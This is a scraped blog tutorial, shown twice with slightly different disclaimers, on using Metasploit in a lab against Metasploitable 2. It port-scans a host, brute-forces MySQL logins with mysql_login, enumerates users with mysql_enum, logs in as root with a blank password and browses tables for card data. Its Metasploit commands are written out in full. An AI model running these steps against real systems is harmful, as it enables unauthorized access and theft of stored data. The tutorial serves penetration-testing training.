METASPLOIT-FINDING AND EXPLOITING A MYSQL USER ACCOUNT

today I will be talking about how you can use MetaSploit to identify a host who has an open instance of MySQL. We will then brute force the host looking for the credentials we can use to login, and lastly we’ll close by examining the database and taking some credit card credentials.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

let’s get started! For the purpose of this, we’ll assume we already have our target host identified.

So first things first, let’s boot up MetaSploit in Kali Linux. We can do this by first starting the necessary services and then by opening the MetaSploit-Framework Console:

<code class="language-prettyprint language-bash prettyprinted"><span class="pln"><span style="color: #00ff00">service postgresql start  
service metasploit start  
msfconsole 

<a href="https://codingsec.net/wp-content/uploads/2016/05/ms1-1.png"><img class="aligncenter size-full wp-image-3672" src="https://codingsec.net/wp-content/uploads/2016/05/ms1-1.png" alt="ms1" width="942" height="500" />
</a></span></span></code>

Now that we have MetaSploit started, let’s identify what possible vectors we may have at our disposal. To do this, we’ll load the TCP port scanner. And set

use auxiliary/scanner/portscan/tcp

Now we need to set a few variables so that MetaSploit does what we want. Specifically, we're going to set the host we would like to run the port scan against and we will raise the number of concurrent threads. To view what variables can be set, simply run show options.

<span style="color: #00ff00"><code class="language-prettyprint language-bash prettyprinted"><span class="pln"> </span></code></span>

To set our victim machine, we’ll set the RHOSTS variable and we’ll set the number of threads with the THREADS. Once those are set, we’ll begin the scan with run:

<code class="language-prettyprint language-bash prettyprinted"><span style="color: #00ff00"><span class="kwd">set</span><span class="pln"> RHOSTS </span><span class="lit">172.16</span><span class="pun">.</span><span class="lit">173.128</span>  
<span class="kwd">set</span><span class="pln"> THREADS </span><span class="lit">256</span></span><span class="pln"><span style="color: #00ff00">  
run </span> </span></code>

Some things to remember when setting THREADS on your personal machine though are:

Keep the THREADS value under 16 on native Win32 systems
Keep THREADS under 200 when running MSF under Cygwin
On Unix-like operating systems, THREADS can be set to 256.

Once this finishes, we’ll be presented with a list of open ports:

From experiece, we know that port 3306 is used for MySQL, but let’s verify this by checking what that port is with theservices command using the -c flag to limit our information to the name of the service, port number and protocol (note that there are no spaces between name, port and proto below):

<code class="language-prettyprint language-bash prettyprinted"><span style="color: #00ff00"><span class="pln">services </span><span class="pun">-</span><span class="pln">p </span><span class="lit">3306</span> <span class="pun">-</span><span class="pln">c name</span><span class="pun">,</span><span class="pln">port</span><span class="pun">,</span></span><span class="pln"><span style="color: #00ff00">proto </span> 
<a href="https://codingsec.net/wp-content/uploads/2016/05/msf3.png"><img class="aligncenter size-full wp-image-3674" src="https://codingsec.net/wp-content/uploads/2016/05/msf3.png" alt="msf3" width="690" height="212" />
</a></span></code>

Now that we know that we our target has mysql open, let’s try to find the credentials to get in. To do this, we’ll switch over to the mysql_login scanner:

<code class="language-prettyprint language-bash prettyprinted"><span style="color: #00ff00"><span class="kwd">use</span><span class="pln"> auxiliary</span><span class="pun">/</span><span class="pln">scanner</span><span class="pun">/</span><span class="pln">mysql</span><span class="pun">/</span></span><span class="pln"><span style="color: #00ff00">mysql_login </span> </span></code>

To use this module, we need to set a few things similar to what we did with the tcp scanner. You can view the available variables with show options. We set the following options:

BLANK_PASSWORDS which tells MetaSploit to try blank passwords for our user list
USERPASS_FILE, which is a file containing username and password combinations on a single line
RHOSTS to `172.16.173.128
THREADS to speed up execution
STOP_ON_SUCCESS which as the name implies, stops our scan once we get a hit.

We’ll set the following values:

<span style="color: #00ff00"><code>set BLANK_PASSWORDS true
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set RHOSTS 172.16.173.128
set THREADS 256
set STOP_ON_SUCCESS true
</code></span>

Once that completes, we can run the creds command to see what we found:

<code class="language-prettyprint language-bash prettyprinted"><span class="pln"><a href="https://codingsec.net/wp-content/uploads/2016/05/msf4.png"><img class="aligncenter size-full wp-image-3675" src="https://codingsec.net/wp-content/uploads/2016/05/msf4.png" alt="msf4" width="838" height="298" /></a>
</span></code>

OK, so we found that the remote MySQL instance has a root user with what would appear to be a blank password. Because MySQL stores it’s users in it’s database, now that we have the root user, we can find out who else exists in that service without the inefficiency of this type of brute force attack. We’ll do this using the MySQL Enumerator module:

<span style="color: #00ff00"><code>use auxiliary/admin/mysql/mysql_enum
</code></span>

As you would guess, we have to set a few options (note that this time we use the option RHOST not RHOSTS):

<span style="color: #00ff00"><code>set RHOST <span style="color: #ff0000">172.16.173.128</span>
set USERNAME root
</code></span>

With those two items set (leaving the PASSWORD option blank since the credentials list didn’t provide us with a password as it would if there was one set) we can start our enumeration scan.

<span style="color: #00ff00"><code>run

<span style="color: #800000"><a href="https://codingsec.net/wp-content/uploads/2016/05/msf5.png"><img class="aligncenter size-full wp-image-3676" src="https://codingsec.net/wp-content/uploads/2016/05/msf5.png" alt="msf5" width="1396" height="1340" />
</a></span>
</code></span>

We see we got a lot of information from this. We can do another check of our creds command to see what we got from this:

Welcome everyone to a great edition of MetaSploit 101 where today I will be talking about how you can use MetaSploit to identify a host who has an open instance of MySQL. We will then brute force the host looking for the credentials we can use to login, and lastly we’ll close by examining the database and taking some credit card credentials. Before we get started though, I gotta share a disclaimer:

This will take advantage of Rapid7’s MetaSploitable 2 virtual machine as our target in an isolated test environment. Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. This type of activity should NOT be attempted against a host or hosts which you do not own or have written permission to perform a security audit against. I cannot and will not be held responsible for unauthorized or unlawful use of the information provided in this article. It is the sole responsibility of the user to ensure that they have the express permission of the owner of the target host to perform this or any other security audit, penetration test, or similar activity.

So with that out of the way, let’s get started! For the purpose of this, we’ll assume we already have our target host identified.

So first things first, let’s boot up MetaSploit in Kali Linux. We can do this by first starting the necessary services and then by opening the MetaSploit-Framework Console:

<code class="language-prettyprint language-bash prettyprinted"><span class="pln">service postgresql start  
service metasploit start  
msfconsole  </span></code>

Now that we have MetaSploit started, let’s identify what possible vectors we may have at our disposal. To do this, we’ll load the TCP port scanner. And set

<code class="language-prettyprint language-bash prettyprinted"><span class="kwd">use</span><span class="pln"> auxiliary</span><span class="pun">/</span><span class="pln">scanner</span><span class="pun">/</span><span class="pln">portscan</span><span class="pun">/</span><span class="pln">tcp  </span></code>

Now we need to set a few variables so that MetaSploit does what we want. Specifically, we’re going to set the host we would like to run the port scan against and we will raise the number of concurrent threads. To view what variables can be set, simply run show options.

To set our victim machine, we’ll set the RHOSTS variable and we’ll set the number of threads with the THREADS. Once those are set, we’ll begin the scan with run:

<code class="language-prettyprint language-bash prettyprinted"><span class="kwd">set</span><span class="pln"> RHOSTS </span><span class="lit">172.16</span><span class="pun">.</span><span class="lit">173.128</span>  
<span class="kwd">set</span><span class="pln"> THREADS </span><span class="lit">256</span><span class="pln">  
run  </span></code>

Some things to remember when setting THREADS on your personal machine though are:

Keep the THREADS value under 16 on native Win32 systems
Keep THREADS under 200 when running MSF under Cygwin
On Unix-like operating systems, THREADS can be set to 256.

Once this finishes, we’ll be presented with a list of open ports:

<code class="language-prettyprint language-bash prettyprinted"><span class="pln">services </span><span class="pun">-</span><span class="pln">p </span><span class="lit">3306</span> <span class="pun">-</span><span class="pln">c name</span><span class="pun">,</span><span class="pln">port</span><span class="pun">,</span><span class="pln">proto  </span></code>

If we didn’t know this though, we could also search for our service of interest like so:

<code class="language-prettyprint language-bash prettyprinted"><span class="pln">services </span><span class="pun">-</span><span class="pln">s mysql  </span></code>

Now that we know that we our target has mysql open, let’s try to find the credentials to get in. To do this, we’ll switch over to the mysql_login scanner:

<code class="language-prettyprint language-bash prettyprinted"><span class="kwd">use</span><span class="pln"> auxiliary</span><span class="pun">/</span><span class="pln">scanner</span><span class="pun">/</span><span class="pln">mysql</span><span class="pun">/</span><span class="pln">mysql_login  </span></code>

To use this module, we need to set a few things similar to what we did with the tcp scanner. You can view the available variables with show options. We set the following options:

BLANK_PASSWORDS which tells MetaSploit to try blank passwords for our user list
USERPASS_FILE, which is a file containing username and password combinations on a single line
RHOSTS to `172.16.173.128
THREADS to speed up execution
STOP_ON_SUCCESS which as the name implies, stops our scan once we get a hit.

We’ll set the following values:

<code>set BLANK_PASSWORDS true
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set RHOSTS 172.16.173.128
set THREADS 256
set STOP_ON_SUCCESS true
</code>

Once that completes, we can run the creds command to see what we found:

<code>use auxiliary/admin/mysql/mysql_enum
</code>

As you would guess, we have to set a few options (note that this time we use the option RHOST not RHOSTS):

<code>set RHOST 172.16.173.128
set USERNAME root
</code>

With those two items set (leaving the PASSWORD option blank since the credentials list didn’t provide us with a password as it would if there was one set) we can start our enumeration scan.

<code>run
</code>

We see we got a lot of information from this. We can do another check of our creds command to see what we got from this:

Great! We have the information we need to connect to the database. Let’s exit MetaSploit and connect to the remote host’s MySQL instance:

<code><span style="color: #00ff00">exit # to exit MetaSploit
mysql -u root -h</span> <span style="color: #ff0000">172.16.173.128
</span></code>

We’re in! Now let’s see what databases we have at our disposal:

<code>show databases;
<a href="https://codingsec.net/wp-content/uploads/2016/05/msf.png"><img class="aligncenter size-full wp-image-3678" src="https://codingsec.net/wp-content/uploads/2016/05/msf.png" alt="msf" width="280" height="344" />

</a></code>

t’s worth noting that our mysql_enum scanner was using the mysql database to collect the user and password information for us. We can work through these to see what each database contains using the following command (the example will use the owasp10 database):

<code class="language-prettyprint language-sql prettyprinted"><span style="color: #00ff00"><span class="pln">show tables </span><span class="kwd">from</span><span class="pln"> owasp10</span><span class="pun">;</span> </span> </code>

We quickly see some stuff of interest in this database:

Congratulations! You’ve just found some information on your victim machine! We saw here an example of how a malicious user could gain access to a MySQL database by taking advantage of weak credentials on the victim’s machine.

<code> </code>

<span style="color: #00ff00"><code class="language-prettyprint language-bash prettyprinted"><span class="pln"> </span></code></span>

<code class="language-prettyprint language-bash prettyprinted"><span class="pln"><span style="color: #00ff00"><a href="https://codingsec.net/wp-content/uploads/2016/05/ms1-1.png">
</a></span> </span></code>

HACK.ME

METASPLOIT-FINDING AND EXPLOITING A MYSQL USER ACCOUNT

Related posts

No comments:

best house builders

Random Post

Recent Post